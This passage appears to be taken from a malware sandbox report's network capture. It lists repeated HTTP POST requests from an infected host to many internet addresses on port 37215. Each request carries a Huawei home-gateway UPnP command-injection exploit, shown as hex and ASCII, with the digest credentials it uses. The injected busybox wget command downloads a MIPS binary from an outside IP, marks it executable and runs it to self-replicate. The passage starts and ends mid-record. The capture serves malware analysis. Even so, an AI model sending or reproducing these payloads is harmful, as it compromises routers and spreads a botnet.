69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.1353050132.117.166.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651937962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.1352810197.188.173.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652007103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.1351864157.168.238.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652008057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.136039041.205.176.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652012110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.1357764197.132.126.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652074099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.1347348104.26.16.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652074099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192.168.2.133931084.15.201.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652076006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192.168.2.134698875.123.100.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652132034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  22192.168.2.1357688197.225.2.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652204990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.1346476157.189.14.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652204990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  24192.168.2.133560041.157.25.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652239084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
